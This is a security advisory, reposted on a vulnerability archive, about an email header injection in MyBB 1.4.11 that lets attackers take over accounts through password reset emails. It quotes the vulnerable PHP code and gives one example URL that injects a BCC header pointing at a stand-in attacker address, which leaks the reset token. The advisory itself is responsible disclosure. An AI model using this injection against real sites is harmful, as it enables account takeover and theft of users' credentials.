exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MyBB 1.4.11 Password Reset

MyBB 1.4.11 Password Reset
Posted Apr 14, 2010
Authored by Stefan Esser

MyBB versions 1.4.11 and below suffer from a password reset vulnerability.

tags | advisory
SHA-256 | eebecf174ba3f29f1d553d050fbff4e47f7d1b2b733b9981a342465b41506447

MyBB 1.4.11 Password Reset

Change Mirror Download

SektionEins GmbH
www.sektioneins.de

-= Security Advisory =-

Advisory: MyBB Password Reset Email BCC: Injection Vulnerability
Release Date: 2010/04/13
Last Modified: 2010/04/13
Author: Stefan Esser [stefan.esser[at]sektioneins.de]

Application: MyBB <= 1.4.11
Severity: An email injection vulnerability in MyBB allows injecting
e.g. BCC mail headers into password reset emails. This
allows an attacker to takeover accounts via the password
reset functionality.
Risk: Critical
Vendor Status: MyBB 1.4.12 was released which fixes this vulnerability
Reference:
http://www.sektioneins.com/en/advisories/advisory-012010-mybb-password-reset-email-bcc-injection-vulnerability/


Overview:

Quote from http://www.mybboard.net
"MyBB is a discussion board that has been around for a while; it has
evolved from other bulletin boards into the forum package it is
today. Therefore, it is a professional and efficient discussion
board, developed by an active team of developers. The MyBB history
has been recorded and is available for the interested to read.
You can also read more about the MyBB team and why they develop
MyBB in their spare time. We also like to highlight the most
active and contributing fansites of the MyBB community."

During evaluation of various password reset implementations it was
discovered that MyBB contains an email injection vulnerability that
allows arbitrary account takeover by injecting BCC: email headers
through a simple URL manipulation.

When triggering the password reset functionality via such a
manipulated URL MyBB will send a copy of the secret password reset
email to wherever the injected BCC: header points to.

Details:

Inside the set_common_header() method of the MailHandler class the
following code is responsible for adding several common headers to
all outgoing emails. This includes all password reset emails.

$this->headers .= "Message-ID: <{$msg_id}>{$this->delimiter}";
$this->headers .= "Content-Transfer-Encoding: 8bit{$this->delimiter}";
$this->headers .= "X-Priority: 3{$this->delimiter}";
$this->headers .= "X-MSMail-Priority: Normal{$this->delimiter}";
$this->headers .= "X-Mailer: MyBB{$this->delimiter}";
if(defined("IN_ADMINCP"))
{
...
}
$this->headers .= "X-MyBB-Script:
{$http_host}{$_SERVER['PHP_SELF']}{$this->delimiter}";
$this->headers .= "MIME-Version: 1.0{$this->delimiter}";

The code above adds a "X-MyBB-Script" header to all outgoing emails,
which contains the content of the $_SERVER['PHP_SELF'] variable.
The problem here is that PHP_SELF does not only contain the path
relative to the document root directory, but also extensions like
the Apache PATH_INFO. Therefore it is controllable by malicious
users.

By calling a MyBB PHP script like

http://example.com/MyBB/index.php/%0aBCC:attacker@example.com%0ax:

it is possible to add arbitrary BCC headers to all emails sent by
this script. If the same attack is used against the password reset
functionality an attacker is able to grab a copy of the secret
password reset token and the randomly generated password, which
results in an account takeover.

This vulnerability was fixed by the vendor by removing the code that
adds the X-MyBB-Script header to the email.

Furthermore it should be noted that users of the Suhosin Extension
version 0.9.30 or newer are safe from this class of attacks because
several unsafe characters like < > " ' \r and \n are automatically
replaced by a ? character within PHP_SELF.

Proof of Concept:

SektionEins GmbH is not going to release a proof of concept
exploit for this vulnerability.

Disclosure Timeline:

31. March 2010 - Notified the MyBB devs via security contact form
13. April 2010 - MyBB developers released MyBB 1.4.12
13. April 2010 - Public Disclosure

Recommendation:

It is recommended to upgrade to the latest version of MyBB.

Grab your copy at:
http://mybboard.net/downloads

CVE Information:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
not assigned a name to this vulnerability.

Month of PHP Security:

If you have a non-public vulnerability like this one, then don't
hesitate to
submit it to the Month of PHP Security. Further information at

http://php-security.org

GPG-Key:

pub 1024D/15ABDA78 2004-10-17 Stefan Esser
Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C 57DD 4AE1 795E 15AB DA78

Copyright 2010 SektionEins GmbH. All rights reserved.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close